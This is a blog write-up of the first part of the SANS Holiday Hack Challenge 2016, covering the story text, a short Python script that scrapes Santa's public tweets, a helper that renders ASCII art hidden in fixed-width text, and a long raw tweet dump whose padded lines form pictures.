Santa's Business Card: SANS Holiday Hack Challenge 2016
Summary
This challenge is graciously provided by the SANS Counter Hack team with the help of other InfoSec community members. It’s a good way to challenge yourself and have fun while doing it. The contributors to this challenge deserve many thanks.
So, I was going through the sent items in my email and found my writeup from the 2016 SANS Holiday Hack Challenge, Santa’s Business Card. It was posted on my previous site, which I decided to move away from for this one, and I thought it was lost forever. That was kind of a bummer, because it was the first CTF/hacking challenge I finished in college. Well, it seems I’ve found it. I will be going through the writeup, revising it, and posting little chunks of it on this blog as I run through it.
I found myself enjoying this challenge a lot. The great thing about what SANS does with these challenges is that everything is still available. Even if you don’t get to do a full challenge one year, you can go back and do it later. Which is awesome of them to do!
Below, in the Santa’s Business Card section, is the introduction to the challenge. The challenge is broken up into about seven different parts. Like I said, I will just be posting this as an introduction of sorts. Other posts will contain the separate parts and the proof-of-concept writeups that justify the conclusions.
Feedback and criticism are always welcome. I will be the first to admit that I have a lot to learn. If you would like to compare notes, I would enjoy reading your content.
Note: I haven’t completed this challenge in a while, so I am going to create a new account and see what I can do while going through the writeup.
Challenge Resources
Unfortunately, the challenge itself is no longer available. It looks like SANS has taken down a lot of past challenges, which is understandable considering the infrastructure that goes into them; it can be rather expensive to maintain.
Story
Part 0 - Santa’s Business Card
‘Twas the night before Christmas, and all through the house, not a creature was stirring, except for…
Josh Dosis.
Although quite snuggled in his bed, the precocious 7-year old couldn’t sleep a wink, what with Christmas Morning just a few hours away. Josh climbed out of his bed and scurried down the hallway to his sister Jessica’s room.
“Wake up, Sis! I can’t sleep!”
With her visions of dancing sugar plums rudely interrupted, Jess slowly stirred, yawned, and rubbed her eyes. “What do you want, Josh?”
“Jess! Christmas is almost here. I can’t wait!” Josh exploded.
Jess lectured her over-eager brother, “I’m excited too, but it’s time to sleep. I’m looking forward to a restful holiday tomorrow, one where no one tries to destroy Christmas.”
Josh recognized his sister’s reference to last year’s trouble with ATNAS Corporation and their quest to foil its criminal plot. “Awww…. That was actually great fun! We always have such wonderful holiday adventures together. I almost wish we had a Twime Machine to relive all those great Christmases of the past,” Josh responded as his loose tooth wriggled in his mouth.
“We have had some wonderful fun, my dear brother, but it’s time to go back to bed,” Jessica responded as she rolled over, hoping her brother would get the message.
And then quite suddenly, the kids were startled by a most unusual sound emanating above their heads: a soft thump followed by a subtle scraping sound, as though something was sliding across their rooftop. “What was that?” Jessica jumped up in surprise.
Immediately afterwards, they heard a muffled jingling of bells.
Josh blurted out, “Oh my gosh, Jess, Santa must have just landed on our house!”
The kids then heard the sound of boots walking across the roof, followed by yet more sliding sounds.
“He must be coming down the chimney. I can’t believe it!” Josh squealed.
The sounds continued without pause as they listened to a master of efficiency get to his work downstairs in their living room. They heard the rumpling of wrapped presents being stacked around the tree, the munching of the cookies they had left for Santa’s refreshment, and even a slight gulping sound as their visitor polished off a glass of eggnog by the cookies. Why, they even heard a quiet but deeply jolly, “Ho Ho Ho.”
“Let’s sneak a peek at him!” Josh said.
Jess shook her head and responded, “Oh, we can’t do that… it might interfere with his operation. Plus, it’s highly unorthodox for kids to see Santa himself.”
As the children debated whether to go downstairs to see Santa, their discussion was interrupted as the sounds coming from their living room took a rather startling turn. A loud “Oooomph!” was followed by what sounded like a scuffle of sorts.
“What’s happening, Sis?” Josh asked.
“I don’t know,” came the response from his quite frightened sister.
Just then, they heard crashing sounds and the tearing of paper, as if their presents were being smashed by a wild brawl. It all culminated with a sharp snapping sound, as though their Christmas tree itself had been split in half in the melee.
And then….
…Nothing.
Utter silence came from their living room.
Part 1 - A Most Curious Business Card
Despite their palpable fear, the Dosis children knew that they had to investigate what had happened. They left Jessica’s room and tiptoed down the stairs warily, making sure to remain hidden in the shadows. As they peered around the corner at the bottom of the steps, what they saw astonished them.
Ruined presents. A shattered Christmas tree. Needles strewn all about. Obvious signs of a fight. And there, beside it all, was Santa’s big blue sack. But Santa himself was nowhere to be found.
In shock, Jessica uttered, “Someone has abducted Santa Claus!”
Josh was horrified. “Who would do such a thing? And on Christmas Eve, no less. They’ll destroy Christmas! But why?”
The kids scanned for clues, and there on the floor, they found a most unexpected item: a small, rectangular piece of cardstock. Picking it up, Joshua announced, “Hey! This looks like Santa’s business card. It must have fallen out of his pocket while someone was kidnapping him.”
Jess took the card from Joshua’s hands and read it. “It is his business card. And we’re the only ones who know that Santa has disappeared. We’ve got to do something. If we don’t find and rescue Santa, Christmas will be destroyed! Let’s look closer at this card to see if it can be any help in finding out what happened.”
And that, Dear Reader, is where you get involved. Take a close look at Santa’s business card. You can also inspect the crime scene by entering the Dosis home here. Based on your analysis, please answer the following questions:
Before answering questions 1 and 2.
After creating an account and avatar, you are dropped into a room with Jessica and Josh Dosis. They provide some clues for this part of the challenge. You are also given some quests:
- Find Santa: locate and rescue Santa Claus.
- Find the villain: Santa’s kidnapper.
There is also Santa’s business card, which is vital information for this part of the challenge. So I decided to grab it with wget after inspecting the site’s source and finding a link to the file.
wget https://quest2016.holidayhackchallenge.com/img/business_card.png
--2020-07-09 23:20:19-- https://quest2016.holidayhackchallenge.com/img/business_card.png
Resolving quest2016.holidayhackchallenge.com (quest2016.holidayhackchallenge.com)... 104.198.162.173
Connecting to quest2016.holidayhackchallenge.com (quest2016.holidayhackchallenge.com)|104.198.162.173|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 53965 (53K) [image/png]
Saving to: ‘business_card.png’
business_card.png 100%[=============================================================>] 52.70K 301KB/s in 0.2s
2020-07-09 23:20:19 (301 KB/s) - ‘business_card.png’ saved [53965/53965]
After downloading the file, I realized that it might not be vital data, because they provide the text on the card in the comments. But I decided to download the file regardless. Below is the text on the card.
Santa W. Claus - Mass Toy Production & Worldwide Distribution Logistics, North Pole
- Twitter: @santawclaus
- Instagram: @santawclaus
This data will be used to solve the first and second questions in this part of the challenge.
1. What is the secret message in Santa’s tweets?
So, it sounds like there is a secret message hidden in Santa’s tweets on Twitter. Santa’s Twitter account is @santawclaus, based on the data provided on the business card. Sounds simple enough. Just have to scrape Santa’s tweets.
In the writeup, it looks like I used a script published on seankross’s Gist named tweet_dumper.py. This script would download as many of a user’s tweets as the Twitter API allowed at the time and vomit the data into a CSV file. I believe this script is written in Python 2.7, which was retired on January 1, 2020, with everyone having moved to Python 3. The Gist provided by seankross, tweet_dumper.py, is linked below.
So, I am left with a couple of options, considering the compatibility issues faced.
- I can attempt to fight with the script that I have available: figure out the dependencies and edit it so Python 3 can interpret the code.
- I can do something that I’ve never done before and write my own script that will scrape Santa’s tweets using Twitter’s API.
How about I give option two a shot. How hard could it be?
Well, not very hard at all, apparently. I almost feel terrible for doing it. But there is a library out there that will let you scrape public Twitter accounts without using the official API. Its name is twitter_scraper. The story behind it is that the developer got annoyed with the backend API and decided to reverse engineer Twitter’s frontend API. It is a Python 3 library, so there were no compatibility issues.
Below is a link to the library’s GitHub.
Below is the code that I wrote. It pulls all of Santa’s tweets using Twitter’s frontend API; this little script just outputs the data to the console.
#!/usr/bin/env python3
"""
file: shhc2016_q1_solution.py
author: Timothy (n3s0)
description: Solution to Question 1 for SANS Holiday Hack Challenge 2016. Will pull all tweets for Santa that are available to the public.
library_dependencies:
- twitter_scraper
shout_out_to:
- https://github.com/bisguzar/twitter-scraper
"""
# import the profile lookup and the tweet iterator from twitter_scraper
from twitter_scraper import Profile, get_tweets

# resolve Santa's public profile (handle taken from the business card)
profile = Profile('santawclaus')

# pull all tweets from the profile and print the text of each one, one per line
for tweet in get_tweets(profile.username):
    print(tweet['text'])
When the script is run and its output redirected into this writeup, it produces the following. Note that these are all of Santa’s tweets: when I checked the total tweet count for Santa’s account, it was 350. This is something we can learn a little from. My jaw dropped to the floor when I saw that this actually worked; this data is accessible with no authentication that I know of.
I haven’t tried this on an account with more privacy restrictions, but that might be a good thing to look into in the future. Will this be a big deal to some? Probably not. But it is interesting to see what this library can do. Enough ranting. The data can be found below.
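Before the raw output, here is an added helper (my own example, not code from the original writeup or from twitter_scraper) that shows what to look for in a dump like this: every tweet has the same width, the non-picture area is padded with a fixed vocabulary of holiday words, and the picture uses "." as background. The filler word list, the threshold, and the 30-column SAMPLE_TWEETS miniature are my assumptions and constructed data; on the real 75-column output below the same functions locate the picture panels and render them.

```python
#!/usr/bin/env python3
"""Added example: spot and render a picture hidden in fixed-width tweets.

Assumptions (mine, not the writeup's): FILLER is the complete set of padding
words, '.' is the picture's background, and anything else is "ink".
SAMPLE_TWEETS is a constructed 30-column miniature of the 75-column dump.
"""

# Padding vocabulary seen in the dump, longest first so greedy matching
# never breaks a long word into a shorter one.
FILLER = (
    "GOODWILLTOWARDSMEN", "PEACEONEARTH", "NORTHPOLE", "CHRISTMAS",
    "HOHOHO", "SANTA", "JOY", "ELF",
)

# Constructed miniature: solid filler rows around a dotted panel that holds
# a small blob of ink (the "hidden" shape).  Every row is exactly 30 wide.
SAMPLE_TWEETS = [
    "SANTAELFHOHOHOCHRISTMASJOYELFQ",
    "JOYELFQP??????????????4SANTAQQ",
    "HOHOHOf..............]ELFSANTA",
    "ELFJOYf....QWJOYQ....]HOHOHOQQ",
    "SANTAQf.....WJOYW....]ELFJOYQQ",
    "ELFELFgaaaaaaaaaaaaaajJOYSANTA",
    "PEACEONEARTHSANTAJOYHOHOHOELFQ",
]


def tokenize(line):
    """Split a tweet into filler words and single non-filler characters."""
    tokens, i = [], 0
    while i < len(line):
        for word in FILLER:
            if line.startswith(word, i):
                tokens.append(word)
                i += len(word)
                break
        else:
            tokens.append(line[i])
            i += 1
    return tokens


def filler_ratio(line):
    """Fraction of the line's characters covered by filler words."""
    if not line:
        return 0.0
    covered = sum(len(t) for t in tokenize(line) if t in FILLER)
    return covered / len(line)


def uniform_width(lines):
    """Common line width if all lines are equal length, else None.

    Equal-length public posts are the first tell that they are a bitmap."""
    widths = {len(line) for line in lines}
    return widths.pop() if len(widths) == 1 else None


def find_panels(lines, max_filler=0.75):
    """(first, last) row indexes of runs where filler text drops off.

    Rows that are mostly filler are solid border; rows with little filler
    are the panels that contain the picture.  Threshold is an assumption."""
    panels, start = [], None
    for idx, line in enumerate(lines):
        if filler_ratio(line) < max_filler:
            if start is None:
                start = idx
        elif start is not None:
            panels.append((start, idx - 1))
            start = None
    if start is not None:
        panels.append((start, len(lines) - 1))
    return panels


def render(lines, ink="#", blank=" "):
    """Two-tone rendering: '.' becomes background, everything else ink."""
    return ["".join(blank if ch == "." else ink for ch in line) for line in lines]


def strip_filler(line):
    """Blank out the filler words so only the picture's own characters remain."""
    return "".join(" " * len(t) if t in FILLER else t for t in tokenize(line))


if __name__ == "__main__":
    print("uniform width:", uniform_width(SAMPLE_TWEETS))
    for first, last in find_panels(SAMPLE_TWEETS):
        print(f"picture rows {first}-{last}:")
        print("\n".join(render(SAMPLE_TWEETS[first:last + 1])))
```

The Q/W padding letters render as ink too, which is fine because they sit in the solid border; use strip_filler() instead of render() when you want to see the picture's own glyphs rather than a silhouette.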
SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO
GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ
GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ
JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS
CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF
HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ
GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ
NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ
SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ
SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ
NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY
PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF
JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS
NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH
SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF
GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY
NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO
NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF
SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF
ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY
JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH
HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ
JOYPEACEONEARTHELFf.......)JOYQ@........??'.......]SANTAPEACEONEARTHHOHOHOQ
JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY
SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY
GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ
HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ
CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ
GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ
CHRISTMASHOHOHOELFQQ...............dQ,..........<GOODWILLTOWARDSMENHOHOHOQQ
GOODWILLTOWARDSMENQQL.............<QQm,........_HOHOHOHOHOHOCHRISTMASELFELF
SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ
CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ
PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA
ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ
ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ
ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH
GOODWILLTOWARDSMENJOYGOODWILLTOWARDSMENGOODWILLTOWARDSMENSANTAELFJOYJOYJOYQ
ELFSANTAPEACEONEARTHJOYJOYQQDT????????????????????4NORTHPOLEPEACEONEARTHELF
NORTHPOLENORTHPOLESANTAQWT^.......................]NORTHPOLEELFHOHOHOJOYELF
HOHOHOHOHOHOCHRISTMASQQP`.........................]JOYGOODWILLTOWARDSMENELF
ELFPEACEONEARTHSANTAQQ(...........................]HOHOHOSANTACHRISTMASJOYQ
JOYJOYCHRISTMASELFJOY(............................]GOODWILLTOWARDSMENHOHOHO
CHRISTMASELFELFELFQQf.............................]HOHOHONORTHPOLEJOYELFJOY
SANTACHRISTMASJOYQQD..............................]HOHOHOHOHOHOSANTASANTAQQ
HOHOHOELFSANTAELFQQ(..............................]GOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMENW...............................]NORTHPOLEHOHOHOHOHOHOJOY
CHRISTMASHOHOHOJOYF...............................]GOODWILLTOWARDSMENSANTAQ
CHRISTMASCHRISTMAS[.........._aaaaaaaaaaaaaaaaaaaajPEACEONEARTHELFNORTHPOLE
SANTANORTHPOLEELFQ(........jJOYQWQWWQWWQWWWWWWWWWGOODWILLTOWARDSMENHOHOHOQQ
ELFPEACEONEARTHELF;.......jWWSANTAGOODWILLTOWARDSMENSANTAGOODWILLTOWARDSMEN
ELFJOYNORTHPOLEJOY`.......QWGOODWILLTOWARDSMENGOODWILLTOWARDSMENCHRISTMASQQ
PEACEONEARTHJOYELF.......]WPEACEONEARTHCHRISTMASNORTHPOLEPEACEONEARTHHOHOHO
CHRISTMASJOYHOHOHO.......]HOHOHOELFGOODWILLTOWARDSMENPEACEONEARTHCHRISTMASQ
JOYCHRISTMASJOYELF.......]PEACEONEARTHCHRISTMASGOODWILLTOWARDSMENELFHOHOHOQ
JOYPEACEONEARTHJOY.......)WGOODWILLTOWARDSMENSANTANORTHPOLEJOYPEACEONEARTHQ
CHRISTMASHOHOHOELF........$WPEACEONEARTHNORTHPOLESANTAPEACEONEARTHSANTAJOYQ
JOYHOHOHOELFELFJOY;.......-QWCHRISTMASGOODWILLTOWARDSMENPEACEONEARTHJOYELFQ
HOHOHOCHRISTMASJOY(........-?$QWJOYCHRISTMASSANTACHRISTMASCHRISTMASHOHOHOQQ
ELFJOYELFCHRISTMASf...............................]PEACEONEARTHNORTHPOLEJOY
ELFHOHOHOSANTAELFQh...............................]GOODWILLTOWARDSMENHOHOHO
SANTACHRISTMASELFQQ,..............................]PEACEONEARTHPEACEONEARTH
GOODWILLTOWARDSMENQL..............................]HOHOHOELFCHRISTMASSANTAQ
GOODWILLTOWARDSMENQQ,.............................]PEACEONEARTHELFHOHOHOJOY
NORTHPOLESANTAHOHOHOm.............................]HOHOHOGOODWILLTOWARDSMEN
PEACEONEARTHCHRISTMASg............................]ELFHOHOHOSANTANORTHPOLEQ
NORTHPOLECHRISTMASJOYQm,..........................]NORTHPOLECHRISTMASSANTAQ
SANTASANTACHRISTMASSANTAw,........................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWQga,,....................]PEACEONEARTHPEACEONEARTH
PEACEONEARTHJOYCHRISTMASELFWCHRISTMASGOODWILLTOWARDSMENJOYPEACEONEARTHSANTA
PEACEONEARTHPEACEONEARTHCHRISTMASJOYSANTAPEACEONEARTHCHRISTMASELFHOHOHOELFQ
GOODWILLTOWARDSMENNORTHPOLECHRISTMASPEACEONEARTHHOHOHOELFJOYNORTHPOLEELFELF
JOYGOODWILLTOWARDSMENSANTACHRISTMASJOYPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOQ
HOHOHOCHRISTMASHOHOHOSANTANORTHPOLEPEACEONEARTHJOYPEACEONEARTHJOYJOYHOHOHOQ
JOYELFGOODWILLTOWARDSMENSANTAQBTT???TT$SANTASANTAPEACEONEARTHNORTHPOLEJOYQQ
SANTACHRISTMASCHRISTMASJOYWP"`.........-"9NORTHPOLEPEACEONEARTHCHRISTMASELF
SANTAELFELFELFSANTAJOYQQWP`...............-4JOYSANTANORTHPOLEJOYSANTASANTAQ
ELFELFELFHOHOHOHOHOHOQQ@'..................."$CHRISTMASELFSANTANORTHPOLEELF
ELFCHRISTMASSANTAELFQQP`.....................-$WELFWPEACEONEARTHSANTASANTAQ
SANTANORTHPOLEJOYELFQE........................-$SANTAELFWGOODWILLTOWARDSMEN
NORTHPOLEELFELFELFQQ@`.........................-QWPEACEONEARTHPEACEONEARTHQ
PEACEONEARTHJOYJOYQQ(...........................]CHRISTMASHOHOHOELFSANTAJOY
HOHOHOCHRISTMASELFQP.............................$NORTHPOLEJOYQWJOYWJOYWELF
SANTACHRISTMASJOYQQ(.............................]WSANTAWPEACEONEARTHJOYELF
HOHOHOSANTAJOYELFQW............_aaaas,............QWCHRISTMASQWHOHOHOSANTAQ
SANTAPEACEONEARTHQf........._wELFWWWWQQw,.........3ELFHOHOHOJOYJOYSANTAELFQ
CHRISTMASSANTAELFQ[........<HOHOHOELFELFQc........]CHRISTMASPEACEONEARTHELF
CHRISTMASCHRISTMAS(......._PEACEONEARTHJOY/.......)NORTHPOLESANTAELFQWELFWQ
PEACEONEARTHSANTAQ`.......dNORTHPOLEHOHOHOm.......:NORTHPOLEWCHRISTMASJOYQQ
PEACEONEARTHELFELF........SANTANORTHPOLEJOY;.......SANTASANTAJOYQWSANTAJOYQ
PEACEONEARTHSANTAQ.......]ELFSANTAJOYJOYELF[.......GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMEN.......]ELFNORTHPOLEJOYQQf.......ELFSANTAJOYHOHOHOQQWELFQ
GOODWILLTOWARDSMEN.......]ELF.......]JOYELF[.......PEACEONEARTHPEACEONEARTH
HOHOHOJOYNORTHPOLE.......]JOY.......]SANTAQ'.......SANTASANTAQQWNORTHPOLEQQ
CHRISTMASNORTHPOLE:......)WQQ.......]SANTAD........NORTHPOLESANTAELFWELFJOY
ELFCHRISTMASSANTAQ;......-JOY.......]ELFQW'.......:PEACEONEARTHCHRISTMASJOY
CHRISTMASSANTAELFQ[.......WQQ.......]ELFD'........=HOHOHOGOODWILLTOWARDSMEN
ELFELFSANTAJOYELFQL.......]QQ.......]ELF..........]PEACEONEARTHQWCHRISTMASQ
NORTHPOLESANTAELFQm.......+QQ.......]ELF;.........jWNORTHPOLENORTHPOLEELFWQ
JOYELFHOHOHOSANTAQQ.................]JOY[.........mCHRISTMASCHRISTMASQQWELF
NORTHPOLENORTHPOLEQ[................]JOYL........_PEACEONEARTHSANTASANTAELF
SANTANORTHPOLEJOYQQm................]ELFk........dHOHOHOPEACEONEARTHQQWJOYQ
PEACEONEARTHHOHOHOQQc...............]JOYm.......]PEACEONEARTHHOHOHOWHOHOHOQ
CHRISTMASHOHOHOJOYQQm...............]ELFQ......_GOODWILLTOWARDSMENNORTHPOLE
JOYELFNORTHPOLEJOYELFL..............]JOYQ;....<SANTAHOHOHONORTHPOLEELFSANTA
PEACEONEARTHELFHOHOHOQ,.............]JOYQ[...wPEACEONEARTHELFSANTAWHOHOHOQQ
CHRISTMASELFELFELFJOYQ6.............]ELFQL_wPEACEONEARTHHOHOHOCHRISTMASELFQ
HOHOHOJOYNORTHPOLEQWELFwaaaaaaaaaaaajPEACEONEARTHGOODWILLTOWARDSMENSANTAQWQ
CHRISTMASELFPEACEONEARTHWWWQWWQWWWWELFELFSANTANORTHPOLESANTAELFQQWJOYHOHOHO
CHRISTMASNORTHPOLEHOHOHOHOHOHOCHRISTMASGOODWILLTOWARDSMENNORTHPOLEHOHOHOWQQ
GOODWILLTOWARDSMENNORTHPOLENORTHPOLESANTANORTHPOLEJOYSANTAELFELFWCHRISTMASQ
GOODWILLTOWARDSMENHOHOHOHOHOHONORTHPOLEELFSANTAELFNORTHPOLEPEACEONEARTHELFQ
PEACEONEARTHELFELFQWPEACEONEARTHPEACEONEARTHHOHOHOPEACEONEARTHWNORTHPOLEWQQ
ELFPEACEONEARTHCHRISTMASELFPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENSANTAQ
SANTASANTASANTAJOYELFJOYWGOODWILLTOWARDSMENPEACEONEARTHSANTAWPEACEONEARTHQQ
PEACEONEARTHSANTAJOYGOODWILLTOWARDSMENSANTACHRISTMASELFCHRISTMASELFJOYQWELF
CHRISTMASCHRISTMASELFELFHOHOHOWJOYWNORTHPOLESANTACHRISTMASWSANTAJOYQQWJOYQQ
ELFJOYSANTAJOYJOYQQWJOYWPEACEONEARTHNORTHPOLEHOHOHOHOHOHONORTHPOLEELFJOYELF
ELFNORTHPOLEJOYSANTANORTHPOLECHRISTMASQQWPEACEONEARTHJOYQWHOHOHOJOYWJOYELFQ
NORTHPOLECHRISTMASHOHOHOSANTAWPEACEONEARTHGOODWILLTOWARDSMENCHRISTMASHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASSANTAQQWELFHOHOHOSANTAQQWJOYSANTAQWSANTAJOY
JOYNORTHPOLEJOYPEACEONEARTHWELFELFQQWNORTHPOLEQWHOHOHONORTHPOLEELFELFHOHOHO
CHRISTMASSANTASANTAWJOYWCHRISTMASHOHOHONORTHPOLEJOYQQWHOHOHOSANTAWNORTHPOLE
PEACEONEARTHSANTASANTAPEACEONEARTHNORTHPOLEJOYJOYJOYELFCHRISTMASHOHOHOSANTA
SANTASANTACHRISTMASJOYJOYJOYELFJOYQWHOHOHOJOYQWPEACEONEARTHELFQQWCHRISTMASQ
GOODWILLTOWARDSMENELFPEACEONEARTHHOHOHOCHRISTMASELFQWHOHOHOWCHRISTMASHOHOHO
CHRISTMASELFELFPEACEONEARTHWELFQQWHOHOHOQQWCHRISTMASELFJOYNORTHPOLEHOHOHOQQ
SANTAPEACEONEARTHQQWJOYWCHRISTMASHOHOHOPEACEONEARTHGOODWILLTOWARDSMENJOYQWQ
JOYJOYHOHOHOELFELFP???????????????????????????????4SANTAQQWPEACEONEARTHELFQ
NORTHPOLENORTHPOLEf...............................]PEACEONEARTHQQWHOHOHOWQQ
CHRISTMASJOYHOHOHOf...............................]ELFGOODWILLTOWARDSMENELF
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOQQWELF
NORTHPOLEHOHOHOELFf...............................]CHRISTMASJOYQWSANTASANTA
SANTAJOYNORTHPOLEQf...............................]SANTAHOHOHOWJOYCHRISTMAS
GOODWILLTOWARDSMENf...............................]PEACEONEARTHHOHOHOQWJOYQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENHOHOHO
JOYCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENf...............................]NORTHPOLEPEACEONEARTHJOY
ELFSANTAHOHOHOELFQf.......aaaaaa/....._aaaaa......]GOODWILLTOWARDSMENWELFQQ
NORTHPOLEHOHOHOELFf.......QWWWWQf.....]QQWWQ......]HOHOHOHOHOHOQQWJOYSANTAQ
SANTANORTHPOLEJOYQf.......HOHOHOf.....]JOYQQ......]HOHOHOHOHOHONORTHPOLEELF
NORTHPOLEJOYJOYELFf.......JOYELFf.....]SANTA......]NORTHPOLEHOHOHONORTHPOLE
SANTASANTASANTAELFf.......JOYELFf.....]SANTA......]NORTHPOLENORTHPOLEELFELF
GOODWILLTOWARDSMENf.......JOYJOYf.....]JOYQW......]PEACEONEARTHHOHOHOQWELFQ
GOODWILLTOWARDSMENf.......HOHOHO[.....)JOYQE......]HOHOHOELFHOHOHOQQWJOYJOY
JOYNORTHPOLEELFELFf.......$WELFQ(......$WQQ(......]PEACEONEARTHNORTHPOLEELF
NORTHPOLEJOYELFJOYf.......)ELFQ@........??'.......]CHRISTMASPEACEONEARTHJOY
SANTAPEACEONEARTHQL........?$QV'..................]HOHOHOGOODWILLTOWARDSMEN
JOYELFPEACEONEARTHk...............................jJOYSANTACHRISTMASWJOYJOY
SANTAPEACEONEARTHQW...............................jSANTAGOODWILLTOWARDSMENQ
CHRISTMASSANTAELFQQ...............................HOHOHOPEACEONEARTHSANTAQQ
ELFCHRISTMASELFELFQ;................;............=NORTHPOLENORTHPOLEJOYELFQ
NORTHPOLEJOYSANTAQQ[...............)L............jPEACEONEARTHJOYHOHOHOQQWQ
CHRISTMASHOHOHOJOYQm...............dQ,..........<GOODWILLTOWARDSMENQWSANTAQ
SANTACHRISTMASSANTAQL.............<QQm,........_JOYELFGOODWILLTOWARDSMENELF
HOHOHOSANTASANTAJOYQQc..........._mELFQc......aGOODWILLTOWARDSMENSANTAJOYWQ
CHRISTMASHOHOHOJOYJOYQw........._mELFQQWmwaawGOODWILLTOWARDSMENNORTHPOLEELF
NORTHPOLEELFPEACEONEARTHw,,..__yELFJOYJOYQWQWQWGOODWILLTOWARDSMENCHRISTMASQ
JOYNORTHPOLEELFNORTHPOLEWGOODWILLTOWARDSMENNORTHPOLEJOYJOYJOYSANTAQQWELFWQQ
JOYSANTAELFHOHOHOQQWNORTHPOLENORTHPOLEGOODWILLTOWARDSMENSANTASANTAHOHOHOJOY
ELFHOHOHOCHRISTMASCHRISTMASELFPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOELFJOYELF
JOYPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENHOHOHONORTHPOLEHOHOHOELFELFJOY
HOHOHOPEACEONEARTHELFJOYJOYQV?"~....--"?$CHRISTMASELFWPEACEONEARTHQWHOHOHOQ
CHRISTMASCHRISTMASJOYELFWW?`.............-?CHRISTMASHOHOHOQWELFWSANTAJOYWQQ
SANTAPEACEONEARTHQQWELFQP`.................-4HOHOHOWCHRISTMASNORTHPOLESANTA
CHRISTMASNORTHPOLEJOYQW(.....................)WGOODWILLTOWARDSMENNORTHPOLEQ
GOODWILLTOWARDSMENJOYW'.......................)WSANTAJOYQQWNORTHPOLEHOHOHOQ
JOYNORTHPOLEHOHOHOJOY(.........................)PEACEONEARTHSANTAELFWJOYWQQ
GOODWILLTOWARDSMENQQf...........................4PEACEONEARTHELFQWCHRISTMAS
NORTHPOLEHOHOHOELFQW`...........................-HOHOHOWCHRISTMASCHRISTMASQ
GOODWILLTOWARDSMENQf.............................]JOYJOYSANTAELFWCHRISTMASQ
HOHOHONORTHPOLEJOYQ`.............................-HOHOHOELFQWCHRISTMASSANTA
ELFELFELFJOYHOHOHOE.........._wwQWQQmga,..........$GOODWILLTOWARDSMENJOYWQQ
NORTHPOLECHRISTMASf........_yJOYWSANTAQQg,........]PEACEONEARTHPEACEONEARTH
SANTANORTHPOLEJOYQ[......._ELFELFSANTAELFQ,.......]CHRISTMASSANTASANTAWJOYQ
CHRISTMASCHRISTMAS;.......dPEACEONEARTHJOYk.......=JOYJOYHOHOHOQWJOYWHOHOHO
ELFNORTHPOLEELFELF......._HOHOHOCHRISTMASQQ,.......NORTHPOLEQWSANTASANTAELF
